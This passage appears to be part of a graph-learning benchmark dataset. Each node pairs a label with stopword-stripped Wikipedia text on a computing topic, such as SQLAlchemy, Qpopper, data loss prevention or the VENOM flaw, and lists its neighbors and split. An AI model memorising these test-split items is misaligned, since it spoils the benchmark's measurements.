      4194,
      10341,
      10344,
      9834,
      3182,
      3695,
      4723,
      3191,
      2679,
      4729,
      5250,
      5251,
      649,
      4746,
      9868,
      11408,
      3218,
      9365,
      11413,
      152,
      11418,
      3228,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      2222,
      6318,
      6319,
      6834,
      9909,
      4793,
      6330,
      7865,
      4797,
      702,
      1218,
      7364,
      6855,
      2760,
      8905,
      1738,
      1229,
      5843,
      3284,
      10461,
      4318,
      7391,
      3297,
      2274,
      3812,
      2797,
      751,
      7407,
      8432,
      8946,
      9967,
      11509,
      7928,
      3322,
      254,
      1280,
      9987,
      5382,
      3847,
      4883,
      10005,
      5402,
      5405,
      8998,
      9511,
      9519,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      6982,
      2887,
      10058,
      2892,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      9572,
      871,
      11112,
      361,
      5482,
      367,
      3959,
      891,
      6524,
      11647,
      10115,
      3460,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      1962,
      6577,
      2996,
      8122,
      1467,
      10171,
      3006,
      8640,
      4033,
      9670,
      2509,
      9167,
      8669,
      8670,
      479,
      10723,
      4068,
      6628,
      7141,
      10727,
      3564,
      3577,
      6651,
      3580,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 10243,
    "label": 2,
    "text": "Windows_Color_System:windows color system windows color system wcs platform color management first included windows vista aims achieve color consistency across various software hardware including cameras monitors printers scanners different devices interpret colors differently according software hardware configurations result must properly calibrated reproduce colors consistently across different devices wcs aims make process color calibration automatic transparent evolution icc profiles windows color system features color infrastructure translation engine cite core backed color processing pipeline supports bit-depths 32 bits per pixel multiple color channels three alternative color spaces high dynamic range coloring using technology named kyuanos developed canon color processing pipeline allows device developers add gamut mapping algorithm pipeline customize color response device new pipeline also supports floating point calculations minimize round-off errors inherent integer processing color pipeline finishes processing colors cite engine applies color translation according color profile specific device ensure output color matches expected wcs features explicit support lcd well crt monitors projectors printers imaging devices provides customized support wcs uses color profiles according ciecam02 defined using xml define color representation actually translates visible color icc v4 color profiles also supported windows photo gallery photo viewer support deprecated v2 standard show dark images used v4 profiles windows imaging component hd photo format xps print path xps documents support color management wcs superset image color management icm first included windows 2000 windows xp windows server 2003",
    "neighbors": [
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      1098,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      7846,
      2221,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      11546,
      4384,
      2854,
      11559,
      10024,
      10026,
      10029,
      11570,
      5952,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      479,
      8161,
      6114,
      4074,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10244,
    "label": 1,
    "text": "Encyclopedia_of_Triangle_Centers:encyclopedia triangle centers encyclopedia triangle centers etc online list thousands points centers associated geometry triangle maintained clark kimberling professor mathematics university evansville list identifies 32,784 triangle centers point list identified index number form x n —for example x 1 incenter information recorded point includes trilinear barycentric coordinates relation lines joining identified points links geometer sketchpad diagrams provided key points encyclopedia also includes glossary terms definitions point list assigned unique name cases particular name arises geometrical historical considerations name star used instead example 770th point list named point acamar first 10 points listed encyclopedia points entries encyclopedia include similar albeit shorter lists exist quadri-figures quadrilaterals systems four lines polygon geometry see external links",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10245,
    "label": 4,
    "text": "Data_loss_prevention_software:data loss prevention software data loss prevention software detects potential data breaches/data ex-filtration transmissions prevents monitoring detecting blocking sensitive data use endpoint actions motion network traffic rest data storage terms data loss data leak related often used interchangeably data loss incidents turn data leak incidents cases media containing sensitive information lost subsequently acquired unauthorized party however data leak possible without losing data originating side terms associated data leakage prevention information leak detection prevention ildp information leak prevention ilp content monitoring filtering cmf information protection control ipc extrusion prevention system eps opposed intrusion prevention system technological means employed dealing data leakage incidents divided categories standard security measures advanced/intelligent security measures access control encryption designated dlp systems standard security measures firewalls intrusion detection systems idss antivirus software commonly available products guard computers outsider insider attacks use firewall example prevents access outsiders internal network intrusion detection system detects intrusion attempts outsiders inside attacks averted antivirus scans detect trojan horses send confidential information use thin clients operate client-server architecture personal sensitive data stored client device advanced security measures employ machine learning temporal reasoning algorithms detecting abnormal access data e.g. databases information retrieval systems abnormal email exchange honeypots detecting authorized personnel malicious intentions activity-based verification e.g. recognition keystroke dynamics user activity monitoring detecting abnormal data access designated systems detect prevent unauthorized attempts copy send sensitive data intentionally unintentionally mainly personnel authorized access sensitive information order classify certain information sensitive use mechanisms exact data matching structured data fingerprinting statistical methods rule regular expression matching published lexicons conceptual definitions keywords network data motion technology typically installed network egress points near perimeter analyzes network traffic detect sensitive data sent violation information security policies multiple security control points may report activity analyzed central management server endpoint data use systems run internal end-user workstations servers like network-based systems endpoint-based technology address internal well external communications therefore used control information flow groups types users e.g 'chinese walls also control email instant messaging communications reach corporate archive blocked communication i.e. one never sent therefore subject retention rules identified subsequent legal discovery situation endpoint systems advantage monitor control access physical devices mobile devices data storage capabilities cases access information encrypted endpoint-based systems provide application controls block attempted transmissions confidential information provide immediate user feedback must installed every workstation network used mobile devices e.g. cell phones pdas practically installed example workstation internet café dlp includes techniques identifying confidential sensitive information sometimes confused discovery data identification process organizations use dlp technology determine look data classified either structured unstructured structured data resides fixed fields within file spreadsheet unstructured data refers free-form text media text documents pdf files video estimated 80 data unstructured 20 structured data classification divided content analysis focused structured data contextual analysis looks place origin application system generated data methods describing sensitive content abundant divided precise imprecise methods precise methods involve content registration trigger almost zero false positive incidents methods imprecise include keywords lexicons regular expressions extended regular expressions meta data tags bayesian analysis statistical analysis techniques machine learning behavior analytics hierarchical threat modeling predefined dlp templates etc strength analysis engine directly relates accuracy accuracy dlp identification important lowering/avoiding false positives negatives accuracy depend many variables may situational technological testing accuracy recommended ensure virtually zero false positives/negatives high false positive rates cause system considered dld dlp sometimes data distributor gives sensitive data one third parties sometime later data found unauthorized place e.g. web user laptop distributor must investigate source leak data rest specifically refers old archived information information great concern businesses government institutions simply longer data left unused storage likely might retrieved unauthorized individuals protecting data involves methods access control data encryption data retention policies data use refers data user currently interacting dlp systems protect data in-use may monitor flag unauthorized activities activities include screen-capture copy/paste print fax operations involving sensitive data intentional unintentional attempts transmit sensitive data communication channels data motion data traversing network endpoint",
    "neighbors": [
      3072,
      10756,
      9227,
      9233,
      9242,
      9761,
      9256,
      9771,
      10297,
      3643,
      7739,
      9791,
      1088,
      5186,
      4165,
      2118,
      107,
      5245,
      127,
      6786,
      5764,
      11400,
      9356,
      7828,
      4245,
      8343,
      10392,
      1690,
      5281,
      2213,
      2733,
      2222,
      10417,
      5305,
      704,
      8387,
      9929,
      5327,
      7891,
      11480,
      4314,
      4344,
      3320,
      5373,
      4863,
      1279,
      2818,
      782,
      7441,
      8978,
      4883,
      278,
      3867,
      8998,
      300,
      3395,
      1358,
      4435,
      1364,
      7515,
      9053,
      3941,
      11621,
      877,
      9591,
      8061,
      7044,
      9102,
      10141,
      939,
      1970,
      4023,
      6588,
      2508,
      3032,
      2528,
      10210,
      9187,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 10246,
    "label": 9,
    "text": "John_C._Reynolds:john c. reynolds john charles reynolds june 1 1935 – april 28 2013 american computer scientist john reynolds studied purdue university earned phd theoretical physics harvard university 1961 professor information science syracuse university 1970 1986 death professor computer science carnegie mellon university also held visiting positions aarhus university denmark university edinburgh imperial college london microsoft research cambridge queen mary university london uk reynolds main research interest area programming language design associated specification languages especially concerning formal semantics invented polymorphic lambda calculus system f formulated property semantic parametricity calculus independently discovered jean-yves girard wrote seminal paper definitional interpreters clarified early work continuations introduced technique defunctionalization applied category theory programming language semantics defined programming languages gedanken forsythe known use intersection types worked separation logic describe reason shared mutable data structures editor journals communications acm journal acm 2001 appointed fellow acm acm sigplan programming language achievement award 2003 lovelace medal british computer society 2010",
    "neighbors": [
      512,
      2595,
      8479,
      11141,
      8262,
      4392,
      4201,
      6536,
      10395,
      1936,
      5585,
      9680,
      1333,
      11574,
      1783,
      8251,
      3263
    ],
    "mask": "Test"
  },
  {
    "node_id": 10247,
    "label": 7,
    "text": "Computation_offloading:computation offloading computer science computation offloading transfer resource intensive computational tasks external platform cluster grid cloud offloading may necessary due hardware limitations devices limited computational power storage energy resource intensive tasks may searching virus scanning image processing artificial intelligence computational decision making etc offloading mainly used mobile cloud computing edge computing fog computing",
    "neighbors": [
      154,
      5956,
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 10248,
    "label": 5,
    "text": "Qpopper:qpopper qpopper one oldest popular server implementations pop3 free open-source server distributed bsd style license common choice internet service providers schools corporations organizations included several linux unix distributions qpopper longer maintained final version 4.1.0 released 2011 qpopper distributed qualcomm source code parties offer pre-compiled pre-configured versions various platforms qpopper ran wide variety platforms including virtually unix linux distribution mac os x even windows cygwin qpopper generally recognized fast stable secure commonly used standard unix mbox format inboxes spools also supported homedir mail mbox linear format messages stored sequentially qpopper supports number optimizations improve speed scalability including cache file maintain mailbox state sessions several optional i/o techniques qpopper started popper around 1989 university california berkeley qualcomm took 1993 renamed qpopper qualcomm original goal promote availability correct modern servers eudora mail client use also provide platform newer extensions",
    "neighbors": [
      2748,
      471,
      5063,
      9863,
      76,
      11500,
      5230,
      9909,
      4439,
      412
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10249,
    "label": 4,
    "text": "Cyber_Storm_II:cyber storm ii cyber storm ii international cyber security exercise sponsored united states department homeland security 2008 week-long exercise centered washington dc concluded march 15",
    "neighbors": [
      826
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10250,
    "label": 1,
    "text": "SQLAlchemy:sqlalchemy sqlalchemy open-source sql toolkit object-relational mapper orm python programming language released mit license sqlalchemy provides full suite well known enterprise-level persistence patterns designed efficient high-performing database access adapted simple pythonic domain language sqlalchemy philosophy relational databases behave less like object collections scale gets larger performance starts concern object collections behave less like tables rows abstraction designed reason adopted data mapper pattern similar hibernate java rather active record pattern used number object-relational mappers however optional plugins allow users develop using declarative syntax sqlalchemy first released february 2006 quickly become one widely used object-relational mapping tools python community alongside django orm following example represents n-to-1 relationship movies directors shown user-defined python classes create corresponding database tables instances relationships created either side relationship finally data queried—illustrating automatically-generated sql queries lazy eager loading creating two python classes according database tables dbms one insert director-movie relationship via either entity sqlalchemy issues following query dbms omitting aliases output setting codice_1 default instead sqlalchemy would first issue query get list movies needed lazy director query get name according director",
    "neighbors": [
      9729,
      3080,
      8554,
      11338,
      5612,
      5677,
      6860,
      7983,
      8718,
      10413,
      3763,
      11221,
      1142,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 10251,
    "label": 9,
    "text": "Multi-user_BASIC:multi-user basic multi-user basic dialect basic language dec pdp-11 running rt-11 operating system one users supported separate address spaces sharing language interpreter syntax language similar identical basic-11 key language element support virtual files similar virtual arrays basic-plus limited array integers floatingpoint character strings length 1 2 4 8 16 32 64 could placed file accessed subscript file could actually opened re-opened different definition allowing integers characters floating point numbers stored file like basic-11 multi-user basic provided support lab equipment support character terminals la30 vt100 multi-user system support real-time data collection",
    "neighbors": [
      1253,
      8262,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10252,
    "label": 4,
    "text": "ThreatConnect:threatconnect threatconnect cyber-security firm based arlington virginia provide threat intelligence platform companies aggregate act upon threat intelligence firm founded 2011 cyber squared inc. adam vincent richard barger andrew pendergast leigh reichel renamed threatconnect series funding 4 million 2014 december 2015 obtained series b funding 16 million company gained attention linked anthem medical data breach chinese government-sponsored entities according cybercrime expert brian krebs threatconnect identified domains used group intentionally similar legitimate domains used anthem also linked guccifer 2.0 responsible 2016 democratic national committee email leak russian-backed cyberespionage group fancy bear cyberattacks attributed fancy bear include group investigating malaysia airlines 17 crash world anti-doping agency recently issued report state-sponsored doping",
    "neighbors": [
      8288,
      8805,
      2090,
      176,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 10253,
    "label": 3,
    "text": "Scroll_Lock:scroll lock scroll lock ⤓ ⇳ lock key typically associated status light ibm-compatible computer keyboards depending operating system may used different purposes applications may assign functions key change behaviour depending toggling state key frequently used therefore reduced specialized keyboards lack altogether pressing performs function pressing behavior remnant original ibm pc keyboards dedicated key instead assigned pause function break function key meant lock scrolling techniques vestige original ibm pc keyboard original design intended modify behavior arrow keys mode arrow keys would scroll contents text window instead moving cursor usage toggling lock key like num lock caps lock state persists key released today particular use rare modern programs honoring behavior include ibm lotus notes forté agent image-line fl studio renoise microsoft excel microsoft project libreoffice calc occasions microsoft word text editors notepad++ microsoft visual studio exhibit similar behavior arrow keys used pressed gui environments neglect means scrolling must accomplished mouse using means scrollbars scroll wheels often middle wheel mouse button works toggle determining mouse movements move mouse cursor scroll contents scroll window web browsers including firefox internet explorer support caret browsing mode toggled window scrolling behaviour caret navigation disabled default similar suggested scroll lock enabling caret navigation enable cursor scrolling behaviour scroll lock disabled pressing key linux console text scrolling screen freezes console output input text sent screen program continues running usual pressed screen unfrozen text generated freeze displayed allows user pause display read long messages scroll screen quickly read example system booting provided keyboard driver already loaded configured otherwise used instead scroll lock terminal linux freeze unfreeze terminal output respectively behaviour emulates hold screen key similar flow control mechanisms computer terminals behaviour must distinguished pressing pause key post dos default effect temporarily halting running process freebsd system console key additionally enables scrolling pressing scroll lock one use scroll pressing scroll lock disables mode moves back bottom output linux console implements behaviour using requiring active multiuser dos system manager real/32 activating boot always enter special diagnostic mode operating system loaded device drivers display detailed status debugging information interaction operating system sometimes several screenfuls per loaded driver automatic scrolling suspended long remains activated dr-dos 7.02 higher provides config.sys directive named codice_1 change scroll lock status fly activating boot enter diag mode well wherein special drivers may display verbose messages contrast situation multiuser dos family normal dos drivers typically display additional information operating system however temporarily suspend automatic timeouts codice_2 config.sys trace codice_3 single-stepping modes long active microsoft windows nt family starting windows 2000 debugging feature enabled allows user manually crash system generating memory dump analysis current state operating system accomplished setting reg_dword registry key hkey_local_machine\\system\\currentcontrolset\\services\\i8042prt\\parameters\\crashonctrlscroll 1 set user hold key tap key twice trigger blue screen death microsoft visual basic 5.0 6.0 pauses running program integrated development environment alias conjunction alternative dos keyboard console drivers freekeyb k3plus also served part copy paste facility applications compared standard keyboard driver keyb drivers offered number extensions including extended keystroke buffer key stacking facility macro recorder second cursor called copycursor could invoked demand default pressing middle mouse button freely moved screen using cursor keys mouse even outside area reachable standard cursor running application invoked pressing left mouse button characters copycursor could stuffed one another keyboard buffer would read running application emulated key alt numpad input thereby typically showing location standard cursor copycursor would move next screen position backwards normal keyboard input still possible copycursor enabled user could switch two cursors toggling hotkey pressing would exit copycursor next invocation would show position standard cursor rather previous location screen contents scrolled position copycursor would move accordingly reaching display limits activated keypresses would still reach normal keystroke buffer copycursor input would stacked internally later use second queue dynamically maintained within extended keystroke buffer thereby possible collect selected screen output different programs spool data much later within yet another application toggling also possible use input macro recorder later use scrap macro since integral part keyboard drivers fully transparent running software therefore worked virtually dos programs including command prompt temporary shelled programs task switchers ibm pc documentation called inactive key pc magazine asked executive keyboard manufacturer key tronic key purpose 1983 interview replied n't know put indicator light sometimes used purposes keyboard layout indicator linux distributions applications less likely cause problems manipulating keys/lights keyboard video mouse switches kvm often use scroll lock key keyboard connected kvm switch selecting computers kvm switches on-screen display osd double click scroll lock key often brings osd allowing user select desired computer list access configuration menu kvm models especially lack osd switch input corresponding number key pressed scroll lock case 2-port switches arrow keys simple models two four inputs may immediately switch next input following double press scroll lock key laptops keyboards physical key second function another key acts key pressed common methods another way press key use onscreen keyboard windows 8 found control panel ease access center selecting start on-screen keyboard provide access emulation standard 101/102-key keyboard windows 10 function performed on-screen keyboard module codice_4 started either command line alternatively run menu",
    "neighbors": [
      6213,
      9864,
      6797,
      847,
      178,
      10130,
      5078,
      2201,
      3642
    ],
    "mask": "None"
  },
  {
    "node_id": 10254,
    "label": 3,
    "text": "YunoHost:yunohost yunohost debian gnu/linux based distribution packaged free software automates installation personal web server purpose yunohost allow users easily host web services enabling simple point-and-click web interface installing various web apps currently supported apps include email server webmail interface wordpress website instant messaging server news aggregator file sharing server seedbox among others name yunohost play words internet meme u yunohost development began march 2012 still actively maintained version 1.0 based debian squeeze released august 5 2012 version 2.0 based debian wheezy released version 2.4 based debian jessie released version 3.0 based debian stretch released version 2.2 released compatible debian wheezy jessie bind replaced dnsmasq mailbox quota system set yunohost 2.4 released includes backup recovery system system fine management service configuration improvements application management packaging many new features bug fixes mysql replaced mariadb theanti-spam amavis replaced rspamd release compatible debian jessie yunohost 3.0 released june 17 2018 includes new features compatible new version debian released almost year ago debian stretch also marks end cycle debian jessie adds new security features program nginx ssh ... also updates metronome rspamd recent versions improvements translation made finally backup/restore system also switches stable version occitan language available released july 5 2019 brings new unified list applications 18 march 2019 time4vps started offer vps servers yunohost template",
    "neighbors": [
      225,
      10242,
      708,
      3237,
      10341,
      4040,
      362,
      8683,
      5356,
      9964,
      5198,
      7022,
      499,
      2228,
      2901,
      9909,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 10255,
    "label": 2,
    "text": "Scanner_Access_Now_Easy:scanner access easy scanner access easy sane application programming interface api provides standardized access raster image scanner hardware flatbed scanner handheld scanner video- still-cameras frame grabbers etc. sane api public domain discussion development open everybody commonly used linux sane differs twain cleanly separated front ends user programs back ends scanner drivers whereas twain driver handles user interface well communications scanner hardware sane driver provides interface hardware describes number options drive scan options specify parameters resolution scan scan area colour model etc option name information type units range possible values e.g. enumerated list convention several well known options front ends supply using convenient gui interaction e.g. scan area options set dragging rectangular outline preview image options presented using gui elements appropriate type e.g. sliders drop-down lists etc one consequence separation network scanning easily implemented special handling either front ends back ends host scanner saned daemon runs handles network requests client machines net back end driver connects remote host fetch scanner options perform previews scans saned daemon acts front end locally simply passes requests data network connections local scanner similarly net back end passes requests data local front end remote host various types unsupervised batch scanning also possible minimum support needed back end driver many scanners support attachment document feeders allow large number sheets paper automatically scanned succession using sane api front end simply play back set options scan driving document feed scans load next sheet paper front end obtain set options user several user interfaces written combine sane easy user method controlling xsane graphical front end sane written oliver rauch available microsoft windows linux unix os/2 licensed gnu general public license gpl windows version allows windows computer access scanner attached unix os/2 mac os x network computer generally local windows computer complete sane-back-ends versions possibly work scanner models connected locally simple scan simplified gui using sane intended easier use better integrate gnome desktop xsane initially written ubuntu maintained robert ancell canonical ltd. linux simple scan first fielded part ubuntu 10.04 lucid lynx also used lubuntu xubuntu gscan2pdf interface scanning documents pdf gnome desktop uses sane communicate scanner available gpl includes common editing tools e.g. rotating cropping pages also able perform ocr using several optional ocr tools save searchable pdf pdf files downsampled upon saving swingsane cross-platform java front end sane written maintained roland quast available microsoft windows linux mac os x licensed apache 2.0 license source code project also adapted use existing swing application",
    "neighbors": [
      3969,
      11394,
      6413,
      6797,
      8848,
      9872,
      7450,
      1822,
      546,
      6691,
      10414,
      7983,
      2864,
      9908,
      823,
      3649,
      3015,
      7626,
      1101,
      8909,
      4177,
      6993,
      8147,
      10971,
      9054,
      10851,
      5095,
      9320,
      7913,
      4459,
      3189,
      5755
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10256,
    "label": 9,
    "text": "Orchidée:orchidée orchidée software developed ircam computer-aided orchestration tool matlab-based application communicates traditional computer-aided composition environments open sound control messages means effectively controlled programs like max/msp openmusic developed grégoire carpentier damien tardieu phds ircam help supervision composer yan maresz recent example use orchestral composition jonathan harvey speakings premiered 2008 speech analyzed computed provide orchestral combinations composer given input target sound orchidée creates musical score imitates sound using mixture traditional instruments searches within large instrument sample database combinations sounds perceptually match target application takes account complex combinatorial possibilities considering virtually infinite sets different sounds created orchestra also considers musical attributes instruments dynamics perceptual attributes brightness roughness example speakings mantra oh/ah/hum analyzed imputed orchidée turn generated different possibilities orchestration mantra developed throughout piece using possibilities musical works using orchidée",
    "neighbors": [
      2667,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 10257,
    "label": 6,
    "text": "List_of_default_file_systems:list default file systems default file system used various operating systems",
    "neighbors": [
      5120,
      2564,
      6148,
      6669,
      3598,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      4151,
      7225,
      11323,
      576,
      4673,
      8772,
      1109,
      1623,
      4708,
      9836,
      7789,
      8301,
      10860,
      9333,
      6263,
      9335,
      636,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      4764,
      6309,
      1190,
      5286,
      10405,
      9899,
      8876,
      5293,
      7344,
      178,
      3250,
      9907,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      2290,
      2291,
      3826,
      6898,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      6445,
      302,
      7983,
      6961,
      6963,
      1844,
      4409,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10590,
      8033,
      10596,
      2407,
      10087,
      4978,
      7027,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10149,
      10151,
      3496,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      9166,
      7126,
      9693,
      2015,
      1509,
      9189,
      4074,
      7663,
      11256,
      2555,
      3068,
      3582
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10258,
    "label": 1,
    "text": "WebScaleSQL:webscalesql webscalesql open-source relational database management system rdbms created software branch production-ready community releases mysql joining efforts companies incorporating various changes new features mysql webscalesql aimed toward fulfilling various needs arising deployment mysql large-scale environments involve large amounts data numerous database servers source code webscalesql hosted github licensed terms version 2 gnu general public license project website announced december 2016 companies involved would longer contribute project running mysql numerous servers large amounts data scale terabytes petabytes data creates set difficulties many cases arise need implementing specific customized mysql features need introducing functional changes mysql companies faced similar set difficulties production environments used result availability multiple solutions similar challenges webscalesql announced march 27 2014 joint effort facebook google linkedin twitter alibaba group joining january 2015 aiming provide centralized development structure extending mysql new features specific large-scale deployments building large replicated databases running server farms result webscalesql attempted open path toward deduplicating efforts founding company putting maintaining branch mysql toward bringing together developers webscalesql created branch mysql latest production-ready community release version 5.6 project aimed tightly follow new mysql community releases branching path selected instead becoming software fork mysql selection mysql production-ready community releases webscalesql upstream instead selecting available mysql forks mariadb percona server result consensus four founding companies concluded features already existing mysql 5.6 suitable large-scale deployments additional features kind planned mysql 5.7 initial changes feature additions webscalesql introduced mysql 5.6 codebase came engineers employed four founding companies however project open peer-reviewed community contributions available new features changes included following planned new features changes included following webscalesql distributed source-code-only form official binaries available compiling source code running webscalesql supported x86-64 linux hosts requiring time toolchain supports c99 c++11 language standards source code hosted github available version 2 gnu general public license gpl v2 december 2016 webscalesql website announced companies originally involved collaborating project facebook google linkedin twitter alibaba would longer contribute project announcement blamed differences among needs various companies end collaboration",
    "neighbors": [
      2688,
      11392,
      8195,
      8582,
      9481,
      4490,
      10505,
      10389,
      10518,
      4376,
      1049,
      9112,
      7453,
      1950,
      9503,
      1952,
      7968,
      290,
      1314,
      7461,
      8742,
      7339,
      10413,
      5550,
      7983,
      5808,
      10873,
      9010,
      10418,
      823,
      3768,
      3004,
      9663,
      4416,
      5441,
      6721,
      11457,
      8518,
      72,
      5964,
      5198,
      7506,
      853,
      2901,
      9687,
      9942,
      9177,
      11221,
      987,
      860,
      10459,
      9183,
      11362,
      10340,
      6245,
      8295,
      8808,
      10471,
      8683,
      5356,
      2413,
      7022,
      10737,
      3188,
      9079,
      2936,
      2681,
      2810,
      9467,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10259,
    "label": 2,
    "text": "List_of_input_methods_for_Unix_platforms:list input methods unix platforms intended non-exhaustive list input methods unix platforms input method means entering characters glyphs corresponding encoding character set see input method page information",
    "neighbors": [
      2684,
      1524,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 10260,
    "label": 3,
    "text": "Socket_AM1:socket am1 socket fs1b branded socket am1 socket designed amd launched april 2014 desktop socs value segment socket am1 intended class cpus contain integrated gpu chipset essentially forming complete soc implementation pins display pci express sata i/o interfaces directly socket amd first compatible cpus designated apus 4 socketable chips kabini family jaguar microarchitecture marketed athlon sempron names announced april 9 2014 brand names athlon sempron underlying microarchitectures jaguar puma products socs means chipset die apu motherboard amd mobile cpus available one 722-pin package socket fs1 sure whether notebook cpus compatible socket am1 vice versa mobile counterpart socket ft3 bga-769 least one board supported coreboot",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      10375,
      3464,
      4872,
      7058,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      7247,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      4451,
      5859,
      1260,
      1005,
      7788,
      7151,
      1651
    ],
    "mask": "Test"
  },
  {
    "node_id": 10261,
    "label": 9,
    "text": "Erroneous_program:erroneous program design programming languages erroneous program one whose semantics well-defined language implementation obligated signal error either compile execution time example ada defining condition erroneous means language implementation need perform potentially expensive check e.g global variable refers object subroutine parameter may nonetheless depend condition true defining semantics program",
    "neighbors": [
      428,
      8262,
      5911
    ],
    "mask": "None"
  },
  {
    "node_id": 10262,
    "label": 8,
    "text": "Open_Web_Analytics:open web analytics open web analytics owa open-source web analytics software created peter adams owa written php uses mysql database makes compatible running amp solution stack various web servers owa comparable google analytics though owa server software anyone install run host google analytics software service offered google owa supports tracking wordpress mediawiki two popular web site frameworks application helps keep track observe influx views website program also tracks competitors company growth compared",
    "neighbors": [
      225,
      8644,
      6533,
      5612,
      7022,
      7983,
      6576,
      467,
      5524,
      119,
      1943
    ],
    "mask": "None"
  },
  {
    "node_id": 10263,
    "label": 4,
    "text": "Cost-based_anti-spam_systems:cost-based anti-spam systems since spam occurs primarily cheap send proposed set solutions require senders pay cost order send spam making prohibitively expensive spammers gatekeeper would sell electronic stamps keep proceeds micropayment electronic money would paid sender recipient isp gatekeeper proof-of-work systems hashcash penny black require sender pay computational cost performing calculation receiver later verify verification must much faster performing calculation computation slows sender significantly impact receiver point slow machines send spam—often millions millions every user wants send email moderate number recipients suffers seconds delay sending millions emails would take unaffordable amount time approach suffers sender maintains computation farm zombies refinement stamp systems method requiring micropayment made form penalty imposed recipient considers email abusive addresses principal objection stamp systems popular free legitimate mailing list hosts would unable continue provide services pay postage every message sent 2004 bill gates announced microsoft working solution requiring so-called “ unknown senders ” i.e senders accepted list recipient post “ electronic equivalent ” stamp whose value would lost sender recipient disapproves email gates said microsoft favors solutions short-term would rely contingent payment solution solve spam problem longer run microsoft aol well yahoo recently introduced systems allow commercial senders avoid filters obtain paid pre-paid certificate certification lost sender recipients complain approach suffers user initially signs legitimate mailing list later decides want receive e-mail lazy users simply click spam button e-mail client rather going formal unsubscription process detailed bottom message end-user gets effect either way without realizing consequences list host may face however companies implementing penalty approach certifying withdrawing certification commercial senders learned account problem setting appropriate complaint thresholds intent sender-at-risk solutions impose significant cost sender recipient rejects message subsequent receiving email deter spam making economically prohibitive send unwanted email messages allowing legitimate emailers send messages little expense anti-spam activist daniel balsam attempts make spamming less profitable bringing lawsuits spammers approach financially sustainable activist questionable whether actually reduces spam either activist anyone else",
    "neighbors": [
      8224,
      1667,
      488,
      6762,
      1899,
      8202,
      8747,
      10826,
      4272,
      914,
      3508,
      5012,
      2358,
      1495,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 10264,
    "label": 4,
    "text": "VENOM_(security_vulnerability):venom security vulnerability venom virtualized environment neglected operations manipulation computer security flaw publicly disclosed 2015 jason geffner crowdstrike flaw introduced 2004 affected versions qemu xen kvm virtualbox date patched following disclosure existence vulnerability due flaw qemu virtual floppy disk controller venom registered common vulnerabilities exposures database cve-2015-3456",
    "neighbors": [
      5636,
      176,
      2709,
      5174,
      8439,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 10265,
    "label": 4,
    "text": "CTERA_Networks:ctera networks ctera networks privately held enterprise software company headquartered new york israel company regional offices uk italy france spain germany australia ctera partnered companies including amazon web services hewlett packard enterprise ibm clients include deutsche telekom banco santander axa united states department defense october 2016 ibm became ctera reseller ibm cloud object storage integrated ctera enterprise file services platform deployed on-premises softlayer cloud hybrid on-premises/cloud setup ctera mentioned gartner 2016 magic quadrant data center backup recovery software ctera founded 2008 liran eshel zohar kaufman company raised 9 million series funding round january 2009 led benchmark capital march 2012 ctera raised 11 million funding round lead venrock included strategic investment cisco systems participation prior investor benchmark capital raised approximately 15 million july 2014 ctera raised 25 million series c funding round led bessemer venture partners participation benchmark capital cisco venrock september 2016 ctera announced additional 25 million funding round led bessemer venture partners participation cisco new investor vintage investment partners investment considered part earlier series c funding round consisted 25 million july 2014 2016 ctera raised 70 million funding gartner named ctera one five cool venders storage technologies 2013 gartner included ctera 2015 critical capabilities enterprise endpoint backup magic quadrant enterprise file synchronization sharing efss ctera included deloitte fast 500 list technology 2015 ctera mentioned gartner 2016 magic quadrant data center backup recovery software june 2016 ctera earned contract provide private cloud file sharing solution united states department defense part agreement ctera disa defense information systems agency co-developed mutual 